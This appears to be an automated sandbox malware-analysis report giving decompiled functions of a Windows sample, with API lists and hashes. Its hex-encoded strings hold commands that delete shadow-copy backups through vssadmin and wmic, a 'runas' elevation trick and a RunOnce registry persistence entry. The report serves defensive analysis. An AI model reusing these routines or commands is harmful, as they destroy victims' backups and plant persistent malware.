                                      0x00402fcf
                                      0x00402fd7
                                      0x00000000
                                      0x00000000
                                      0x00402fed
                                      0x00402ff0
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00402ff0
                                      0x00403011
                                      0x00403022
                                      0x00403022
                                      0x00402fb8
                                      0x00402f99
                                      0x00402f9e
                                      0x00402f9e
                                      0x00402f81
                                      0x00402f81
                                      0x00402f81
                                      0x00000000

                                      APIs
                                      • EnumDeviceDrivers.PSAPI(?,00000004,?), ref: 00402F74
                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00402F8D
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocDeviceDriversEnumVirtual
                                      • String ID:
                                      • API String ID: 4140748134-0
                                      • Opcode ID: 0a6431d7b680dec11b95763bc23b6023e0c9d24f66c7ef9fbc3c6dcadf6177f1
                                      • Instruction ID: ae1065d34e0a9f40daa088a41d748c469a9f576a3d92cbe81eb507f1f3ca9255
                                      • Opcode Fuzzy Hash: 0a6431d7b680dec11b95763bc23b6023e0c9d24f66c7ef9fbc3c6dcadf6177f1
                                      • Instruction Fuzzy Hash: 9621A43260011AABEB109B989D89FAAB7BCEB44715F1001B6EE04E61D0D7B19D05AB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 227 4077f0-4079db InternetOpenW 228 4079f2-4079f8 227->228 229 4079dd-4079ef InternetOpenW 227->229 229->228
                                      C-Code - Quality: 100%
                                      			E004077F0(void* __ecx) {
                                      				short _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr _v56;
                                      				intOrPtr _v60;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				intOrPtr _v72;
                                      				intOrPtr _v76;
                                      				intOrPtr _v80;
                                      				intOrPtr _v84;
                                      				intOrPtr _v88;
                                      				intOrPtr _v92;
                                      				intOrPtr _v96;
                                      				intOrPtr _v100;
                                      				intOrPtr _v104;
                                      				intOrPtr _v108;
                                      				intOrPtr _v112;
                                      				intOrPtr _v116;
                                      				intOrPtr _v120;
                                      				intOrPtr _v124;
                                      				intOrPtr _v128;
                                      				intOrPtr _v132;
                                      				intOrPtr _v136;
                                      				intOrPtr _v140;
                                      				intOrPtr _v144;
                                      				intOrPtr _v148;
                                      				intOrPtr _v152;
                                      				intOrPtr _v156;
                                      				intOrPtr _v160;
                                      				intOrPtr _v164;
                                      				intOrPtr _v168;
                                      				intOrPtr _v172;
                                      				intOrPtr _v176;
                                      				intOrPtr _v180;
                                      				intOrPtr _v184;
                                      				intOrPtr _v188;
                                      				intOrPtr _v192;
                                      				intOrPtr _v196;
                                      				intOrPtr _v200;
                                      				intOrPtr _v204;
                                      				intOrPtr _v208;
                                      				intOrPtr _v212;
                                      				intOrPtr _v216;
                                      				intOrPtr _v220;
                                      				short _v224;
                                      				WCHAR* _t62;
                                      				void* _t64;
                                      
                                      				_v8 = 0;
                                      				_v224 = 0x6f004d;
                                      				_v220 = 0x69007a;
                                      				_v216 = 0x6c006c;
                                      				_v212 = 0x2f0061;
                                      				_v208 = 0x2e0035;
                                      				_v204 = 0x200030;
                                      				_v200 = 0x570028;
                                      				_v196 = 0x6e0069;
                                      				_v192 = 0x6f0064;
                                      				_v188 = 0x730077;
                                      				_v184 = 0x4e0020;
                                      				_v180 = 0x200054;
                                      				_v176 = 0x2e0036;
                                      				_v172 = 0x3b0031;
                                      				_v168 = 0x570020;
                                      				_v164 = 0x57004f;
                                      				_v160 = 0x340036;
                                      				_v156 = 0x200029;
                                      				_v152 = 0x700041;
                                      				_v148 = 0x6c0070;
                                      				_v144 = 0x570065;
                                      				_v140 = 0x620065;
                                      				_v136 = 0x69004b;
                                      				_v132 = 0x2f0074;
                                      				_v128 = 0x330035;
                                      				_v124 = 0x2e0037;
                                      				_v120 = 0x360033;
                                      				_v116 = 0x280020;
                                      				_v112 = 0x48004b;
                                      				_v108 = 0x4d0054;
                                      				_v104 = 0x2c004c;
                                      				_v100 = 0x6c0020;
                                      				_v96 = 0x6b0069;
                                      				_v92 = 0x200065;
                                      				_v88 = 0x650047;
                                      				_v84 = 0x6b0063;
                                      				_v80 = 0x29006f;
                                      				_v76 = 0x430020;
                                      				_v72 = 0x720068;
                                      				_v68 = 0x6d006f;
                                      				_v64 = 0x2f0065;
                                      				_v60 = 0x350035;
                                      				_v56 = 0x30002e;
                                      				_v52 = 0x32002e;
                                      				_v48 = 0x380038;
                                      				_v44 = 0x2e0033;
                                      				_v40 = 0x370038;
                                      				_v36 = 0x530020;
                                      				_v32 = 0x660061;
                                      				_v28 = 0x720061;
                                      				_v24 = 0x2f0069;
                                      				_v20 = 0x330035;
                                      				_v16 = 0x2e0037;
                                      				_v12 = 0x360033;
                                      				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0);
                                      				 *(__ecx + 4) = _t62;
                                      				if(_t62 == 0) {
                                      					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
                                      					 *(__ecx + 4) = _t64;
                                      					return _t64;
                                      				}
                                      				return _t62;
                                      			}




























































                                      0x00407808
                                      0x00407814
                                      0x0040781f
                                      0x00407829
                                      0x00407833
                                      0x0040783d
                                      0x00407847
                                      0x00407851
                                      0x0040785b
                                      0x00407865
                                      0x0040786f
                                      0x00407879
                                      0x00407883
                                      0x0040788d
                                      0x00407897
                                      0x004078a1
                                      0x004078ab
                                      0x004078b5
                                      0x004078bf
                                      0x004078c9
                                      0x004078d3
                                      0x004078dd
                                      0x004078e7
                                      0x004078f1
                                      0x004078fb
                                      0x00407902
                                      0x00407909
                                      0x00407910
                                      0x00407917
                                      0x0040791e
                                      0x00407925
                                      0x0040792c
                                      0x00407933
                                      0x0040793a
                                      0x00407941
                                      0x00407948
                                      0x0040794f
                                      0x00407956
                                      0x0040795d
                                      0x00407964
                                      0x0040796b
                                      0x00407972
                                      0x00407979
                                      0x00407980
                                      0x00407987
                                      0x0040798e
                                      0x00407995
                                      0x0040799c
                                      0x004079a3
                                      0x004079aa
                                      0x004079b1
                                      0x004079b8
                                      0x004079bf
                                      0x004079c6
                                      0x004079cd
                                      0x004079d4
                                      0x004079d6
                                      0x004079db
                                      0x004079ed
                                      0x004079ef
                                      0x00000000
                                      0x004079ef
                                      0x004079f8

                                      APIs
                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004079D4
                                      • InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 004079ED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InternetOpen
                                      • String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
                                      • API String ID: 2038078732-2805935662
                                      • Opcode ID: e653d41a08787fca1086a43a758d594d3257da7c4271a42bac81f70514e5fa4e
                                      • Instruction ID: 8ec0cbb63084930b06e9c442bfdedbe0f88dfa63fe684bf69a99aafbe0ca1518
                                      • Opcode Fuzzy Hash: e653d41a08787fca1086a43a758d594d3257da7c4271a42bac81f70514e5fa4e
                                      • Instruction Fuzzy Hash: 0541A8B4811369DEEB21CF91999879EBFF5BB04748F50819ED5087B201C7F60A89CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 303 404330-404346 call 403ae0 306 4043e0-4044cd 303->306 307 40434c-4043db 303->307 308 4044d8-4044f9 VirtualAlloc 306->308 307->308 309 4044fb-4044fd 308->309 310 4044ff-40452d GetSystemDirectoryW lstrcatW ShellExecuteW 308->310 311 40452f-404545 VirtualFree 309->311 310->311
                                      C-Code - Quality: 97%
                                      			E00404330(void* __eflags) {
                                      				short _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr _v56;
                                      				intOrPtr _v60;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				intOrPtr _v72;
                                      				intOrPtr _v76;
                                      				intOrPtr _v80;
                                      				char _v84;
                                      				intOrPtr _v88;
                                      				intOrPtr _v92;
                                      				intOrPtr _v96;
                                      				intOrPtr _v100;
                                      				intOrPtr _v104;
                                      				intOrPtr _v108;
                                      				intOrPtr _v112;
                                      				intOrPtr _v116;
                                      				char _v120;
                                      				short _v124;
                                      				intOrPtr _v128;
                                      				intOrPtr _v132;
                                      				intOrPtr _v136;
                                      				intOrPtr _v140;
                                      				intOrPtr _v144;
                                      				intOrPtr _v148;
                                      				char _v152;
                                      				short _v156;
                                      				intOrPtr _v160;
                                      				intOrPtr _v164;
                                      				intOrPtr _v168;
                                      				char _v172;
                                      				short* _v176;
                                      				short* _t51;
                                      				WCHAR* _t59;
                                      				void* _t62;
                                      				signed int _t66;
                                      				void* _t69;
                                      
                                      				if(E00403AE0(_t62) == 0) {
                                      					_v172 = 0x63005c;
                                      					_v168 = 0x64006d;
                                      					_v8 = 0;
                                      					_t59 =  &_v172;
                                      					_v164 = 0x65002e;
                                      					_t51 =  &_v84;
                                      					_v160 = 0x650078;
                                      					_v156 = 0;
                                      					_v84 = 0x63002f;
                                      					_v80 = 0x760020;
                                      					_v76 = 0x730073;
                                      					_v72 = 0x640061;
                                      					_v68 = 0x69006d;
                                      					_v64 = 0x20006e;
                                      					_v60 = 0x650064;
                                      					_v56 = 0x65006c;
                                      					_v52 = 0x650074;
                                      					_v48 = 0x730020;
                                      					_v44 = 0x610068;
                                      					_v40 = 0x6f0064;
                                      					_v36 = 0x730077;
                                      					_v32 = 0x2f0020;
                                      					_v28 = 0x6c0061;
                                      					_v24 = 0x20006c;
                                      					_v20 = 0x71002f;
                                      					_v16 = 0x690075;
                                      					_v12 = 0x740065;
                                      				} else {
                                      					_v152 = 0x77005c;
                                      					_v148 = 0x650062;
                                      					_t59 =  &_v152;
                                      					_v144 = 0x5c006d;
                                      					_t51 =  &_v120;
                                      					_v140 = 0x6d0077;
                                      					_v136 = 0x630069;
                                      					_v132 = 0x65002e;
                                      					_v128 = 0x650078;
                                      					_v124 = 0;
                                      					_v120 = 0x680073;
                                      					_v116 = 0x640061;
                                      					_v112 = 0x77006f;
                                      					_v108 = 0x6f0063;
                                      					_v104 = 0x790070;
                                      					_v100 = 0x640020;
                                      					_v96 = 0x6c0065;
                                      					_v92 = 0x740065;
                                      					_v88 = 0x65;
                                      				}
                                      				_v176 = _t51;
                                      				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
                                      				if(_t69 != 0) {
                                      					GetSystemDirectoryW(_t69, 0x100);
                                      					lstrcatW(_t69, _t59);
                                      					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
                                      					asm("sbb edi, edi");
                                      					_t66 =  ~0x20;
                                      				} else {
                                      					_t66 = 0;
                                      				}
                                      				VirtualFree(_t69, 0, 0x8000);
                                      				return _t66;
                                      			}



















































                                      0x00404346
                                      0x004043e2
                                      0x004043ec
                                      0x004043f4
                                      0x004043fc
                                      0x00404400
                                      0x00404408
                                      0x0040440c
                                      0x00404414
                                      0x00404419
                                      0x00404421
                                      0x00404429
                                      0x00404431
                                      0x00404439
                                      0x00404441
                                      0x00404449
                                      0x00404454
                                      0x0040445f
                                      0x0040446a
                                      0x00404475
                                      0x00404480
                                      0x0040448b
                                      0x00404496
                                      0x004044a1
                                      0x004044ac
                                      0x004044b7
                                      0x004044c2
                                      0x004044cd
                                      0x0040434c
                                      0x0040434e
                                      0x00404356
                                      0x0040435e
                                      0x00404362
                                      0x0040436a
                                      0x0040436e
                                      0x00404376
                                      0x0040437e
                                      0x00404386
                                      0x0040438e
                                      0x00404393
                                      0x0040439b
                                      0x004043a3
                                      0x004043ab
                                      0x004043b3
                                      0x004043bb
                                      0x004043c3
                                      0x004043cb
                                      0x004043d3
                                      0x004043d3
                                      0x004044e6
                                      0x004044f5
                                      0x004044f9
                                      0x00404505
                                      0x0040450d
                                      0x00404523
                                      0x0040452b
                                      0x0040452d
                                      0x004044fb
                                      0x004044fb
                                      0x004044fb
                                      0x00404537
                                      0x00404545

                                      APIs
                                        • Part of subcall function 00403AE0: _memset.LIBCMT ref: 00403B32
                                        • Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00403B56
                                        • Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00403B5A
                                        • Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00403B5E
                                        • Part of subcall function 00403AE0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00403B85
                                      • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 004044EF
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 00404505
                                      • lstrcatW.KERNEL32(00000000,0063005C), ref: 0040450D
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 00404523
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404537
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
                                      • String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
                                      • API String ID: 2684037697-4098772853
                                      • Opcode ID: 457aec27be439b32d5edbcfb73d8ffc908ef2337d77650b0000b9c1325a34fbc
                                      • Instruction ID: b655391ad336c4b4d1e3433ef327ff3d08d390bc764b3395417c8c24b6d0b817
                                      • Opcode Fuzzy Hash: 457aec27be439b32d5edbcfb73d8ffc908ef2337d77650b0000b9c1325a34fbc
                                      • Instruction Fuzzy Hash: 7D41FAB0248380DFE3208F119949B5BBEE6BBC5B49F10491DE6985A291C7F6854CCF9B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 100%
                                      			E00403BA0(void* __ecx, void* __edx, void* __eflags) {
                                      				char _v1020;
                                      				short _v1028;
                                      				char _v1532;
                                      				short _v1540;
                                      				intOrPtr _v1548;
                                      				intOrPtr _v1552;
                                      				intOrPtr _v1556;
                                      				intOrPtr _v1560;
                                      				intOrPtr _v1564;
                                      				intOrPtr _v1568;
                                      				intOrPtr _v1572;
                                      				intOrPtr _v1576;
                                      				intOrPtr _v1580;
                                      				intOrPtr _v1584;
                                      				intOrPtr _v1588;
                                      				intOrPtr _v1592;
                                      				intOrPtr _v1596;
                                      				intOrPtr _v1600;
                                      				intOrPtr _v1604;
                                      				intOrPtr _v1608;
                                      				intOrPtr _v1612;
                                      				intOrPtr _v1616;
                                      				short _v1620;
                                      				intOrPtr _v1624;
                                      				intOrPtr _v1628;
                                      				intOrPtr _v1632;
                                      				intOrPtr _v1636;
                                      				intOrPtr _v1640;
                                      				intOrPtr _v1644;
                                      				intOrPtr _v1648;
                                      				intOrPtr _v1652;
                                      				intOrPtr _v1656;
                                      				intOrPtr _v1660;
                                      				intOrPtr _v1664;
                                      				intOrPtr _v1668;
                                      				intOrPtr _v1672;
                                      				short _v1676;
                                      				char _v1680;
                                      				int _t54;
                                      				struct HWND__* _t62;
                                      				long _t66;
                                      				void* _t76;
                                      				void* _t78;
                                      				void* _t80;
                                      
                                      				_t78 = __ecx;
                                      				_t54 = E00403AE0(__edx);
                                      				if(_t54 != 0) {
                                      					_t54 = E00403A60();
                                      					if(_t54 == 0) {
                                      						_v1676 = 0x770025;
                                      						_v1672 = 0x6e0069;
                                      						_v1668 = 0x690064;
                                      						_v1664 = 0x250072;
                                      						_v1660 = 0x73005c;
                                      						_v1656 = 0x730079;
                                      						_v1652 = 0x650074;
                                      						_v1648 = 0x33006d;
                                      						_v1644 = 0x5c0032;
                                      						_v1640 = 0x620077;
                                      						_v1636 = 0x6d0065;
                                      						_v1632 = 0x77005c;
                                      						_v1628 = 0x69006d;
                                      						_v1624 = 0x63;
                                      						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
                                      						_v1620 = 0x720070;
                                      						_v1616 = 0x63006f;
                                      						_v1612 = 0x730065;
                                      						_v1608 = 0x200073;
                                      						_v1604 = 0x610063;
                                      						_v1600 = 0x6c006c;
                                      						_v1596 = 0x630020;
                                      						_v1592 = 0x650072;
                                      						_v1588 = 0x740061;
                                      						_v1584 = 0x200065;
                                      						_v1580 = 0x630022;
                                      						_v1576 = 0x64006d;
                                      						_v1572 = 0x2f0020;
                                      						_v1568 = 0x200063;
                                      						_v1564 = 0x740073;
                                      						_v1560 = 0x720061;
                                      						_v1556 = 0x200074;
                                      						_v1552 = 0x730025;
                                      						_v1548 = 0x22;
                                      						wsprintfW( &_v1028,  &_v1620, _t78);
                                      						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
                                      						 *_t76 = 0x3c;
                                      						 *(_t76 + 4) = 0x40;
                                      						_t62 = GetForegroundWindow();
                                      						_t80 = 0;
                                      						 *(_t76 + 8) = _t62;
                                      						_v1680 = 0x750072;
                                      						_v1676 = 0x61006e;
                                      						_v1672 = 0x73;
                                      						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
                                      						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
                                      						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
                                      						 *(_t76 + 0x18) = 0;
                                      						 *(_t76 + 0x1c) = 0;
                                      						 *(_t76 + 0x20) = 0;
                                      						while(1) {
                                      							_t66 = ShellExecuteExW(_t76);
                                      							if(_t66 != 0) {
                                      								break;
                                      							}
                                      							_t80 = _t80 + 1;
                                      							if(_t80 < 0x64) {
                                      								continue;
                                      							}
                                      							_t54 = VirtualFree(_t76, _t66, 0x8000);
                                      							goto L6;
                                      						}
                                      						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
                                      						CloseHandle( *(_t76 + 0x38));
                                      						ExitProcess(0);
                                      					}
                                      				}
                                      				L6:
                                      				return _t54;
                                      			}















































                                      0x00403baf
                                      0x00403bb1
                                      0x00403bb8
                                      0x00403bbe
                                      0x00403bc5
                                      0x00403bd7
                                      0x00403be4
                                      0x00403bed
                                      0x00403bf5
                                      0x00403bfd
                                      0x00403c05
                                      0x00403c0d
                                      0x00403c15
                                      0x00403c1d
                                      0x00403c25
                                      0x00403c2d
                                      0x00403c35
                                      0x00403c3d
                                      0x00403c45
                                      0x00403c4d
                                      0x00403c58
                                      0x00403c68
                                      0x00403c71
                                      0x00403c79
                                      0x00403c81
                                      0x00403c89
                                      0x00403c91
                                      0x00403c99
                                      0x00403ca1
                                      0x00403ca9
                                      0x00403cb4
                                      0x00403cbf
                                      0x00403cca
                                      0x00403cd5
                                      0x00403ce0
                                      0x00403ceb
                                      0x00403cf6
                                      0x00403d01
                                      0x00403d0c
                                      0x00403d17
                                      0x00403d31
                                      0x00403d33
                                      0x00403d39
                                      0x00403d40
                                      0x00403d4c
                                      0x00403d4e
                                      0x00403d55
                                      0x00403d5d
                                      0x00403d65
                                      0x00403d6d
                                      0x00403d77
                                      0x00403d81
                                      0x00403d84
                                      0x00403d8b
                                      0x00403d92
                                      0x00403da0
                                      0x00403da1
                                      0x00403da5
                                      0x00000000
                                      0x00000000
                                      0x00403da7
                                      0x00403dab
                                      0x00000000
                                      0x00000000
                                      0x00403db4
                                      0x00000000
                                      0x00403db4
                                      0x00403dc6
                                      0x00403dcf
                                      0x00403dd7
                                      0x00403dd7
                                      0x00403bc5
                                      0x00403dba
                                      0x00403dc0

                                      APIs
                                        • Part of subcall function 00403AE0: _memset.LIBCMT ref: 00403B32
                                        • Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00403B56
                                        • Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00403B5A
                                        • Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00403B5E
                                        • Part of subcall function 00403AE0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00403B85
                                        • Part of subcall function 00403A60: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00403A90
                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403C4D
                                      • wsprintfW.USER32 ref: 00403D17
                                      • VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 00403D2B
                                      • GetForegroundWindow.USER32 ref: 00403D40
                                      • ShellExecuteExW.SHELL32(00000000), ref: 00403DA1
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00403DB4
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00403DC6
                                      • CloseHandle.KERNEL32(?), ref: 00403DCF
                                      • ExitProcess.KERNEL32 ref: 00403DD7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
                                      • String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
                                      • API String ID: 561366689-3790645798
                                      • Opcode ID: b6707db397b164f005e7f481d8c6e4cfd5bd65f7e48af9735fd005866d46f993
                                      • Instruction ID: cc7589b939d66cedc96280ec9e713ba096b07f437b5f45324ccf50025119f88d
                                      • Opcode Fuzzy Hash: b6707db397b164f005e7f481d8c6e4cfd5bd65f7e48af9735fd005866d46f993
                                      • Instruction Fuzzy Hash: FF515CB0108341DFE3208F11C94878BBFF9BF84749F00492DE5989A292D7FA9558CF96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 94%
                                      			E00402960(char* __ecx, void* __eflags) {
                                      				void* _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				short _v32;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr _v56;
                                      				intOrPtr _v60;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				intOrPtr _v72;
                                      				intOrPtr _v76;
                                      				intOrPtr _v80;
                                      				intOrPtr _v84;
                                      				intOrPtr _v88;
                                      				intOrPtr _v92;
                                      				intOrPtr _v96;
                                      				intOrPtr _v100;
                                      				intOrPtr _v104;
                                      				intOrPtr _v108;
                                      				intOrPtr _v112;
                                      				intOrPtr _v116;
                                      				intOrPtr _v120;
                                      				intOrPtr _v124;
                                      				intOrPtr _v128;
                                      				intOrPtr _v132;
                                      				intOrPtr _v136;
                                      				short _v140;
                                      				int _t47;
                                      				char* _t58;
                                      
                                      				_t58 = __ecx;
                                      				_v32 = 0x520050;
                                      				_v28 = 0x440049;
                                      				_push(0x41);
                                      				_v24 = 0x520055;
                                      				_v20 = 0x530041;
                                      				_v16 = 0x4b0048;
                                      				_v12 = 0x41;
                                      				E00407C60( &_v32, lstrlenW( &_v32));
                                      				_v140 = 0x4f0053;
                                      				_t10 =  &_v8; // 0x402c45
                                      				_v136 = 0x540046;
                                      				_v132 = 0x410057;
                                      				_v128 = 0x450052;
                                      				_v124 = 0x4d005c;
                                      				_v120 = 0x630069;
                                      				_v116 = 0x6f0072;
                                      				_v112 = 0x6f0073;
                                      				_v108 = 0x740066;
                                      				_v104 = 0x57005c;
                                      				_v100 = 0x6e0069;
                                      				_v96 = 0x6f0064;
                                      				_v92 = 0x730077;
                                      				_v88 = 0x43005c;
                                      				_v84 = 0x720075;
                                      				_v80 = 0x650072;
                                      				_v76 = 0x74006e;
                                      				_v72 = 0x650056;
                                      				_v68 = 0x730072;
                                      				_v64 = 0x6f0069;
                                      				_v60 = 0x5c006e;
                                      				_v56 = 0x750052;
                                      				_v52 = 0x4f006e;
                                      				_v48 = 0x63006e;
                                      				_v44 = 0x65;
                                      				if(RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0, _t10, 0) != 0) {
                                      					return 0;
                                      				} else {
                                      					_t47 = lstrlenW(_t58);
                                      					_t37 =  &_v8; // 0x402c45
                                      					RegSetValueExW( *_t37,  &_v32, 0, 1, _t58, _t47 + _t47);
                                      					asm("sbb esi, esi");
                                      					RegCloseKey(_v8);
                                      					_t39 =  &(_t58[1]); // 0x1
                                      					return _t39;
                                      				}
                                      			}





































                                      0x0040296b
                                      0x0040296d
                                      0x00402979
                                      0x00402980
                                      0x00402984
                                      0x0040298c
                                      0x00402993
                                      0x0040299a
                                      0x004029a8
                                      0x004029b0
                                      0x004029ba
                                      0x004029bd
                                      0x004029c7
                                      0x004029ce
                                      0x004029eb
                                      0x004029f8
                                      0x004029ff
                                      0x00402a06
                                      0x00402a0d
                                      0x00402a14
                                      0x00402a1b
                                      0x00402a22
                                      0x00402a29
                                      0x00402a30
                                      0x00402a37
                                      0x00402a3e
                                      0x00402a45
                                      0x00402a4c
                                      0x00402a53
                                      0x00402a5a
                                      0x00402a61
                                      0x00402a68
                                      0x00402a6f
                                      0x00402a76
                                      0x00402a7d
                                      0x00402a8c
                                      0x00402ac7
                                      0x00402a8e
                                      0x00402a8f
                                      0x00402aa1
                                      0x00402aa4
                                      0x00402aaf
                                      0x00402ab1
                                      0x00402ab7
                                      0x00402abf
                                      0x00402abf

                                      APIs
                                      • lstrlenW.KERNEL32(00520050,00000041,74CF82B0,00000000), ref: 0040299D
                                        • Part of subcall function 00407C60: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00407C7D
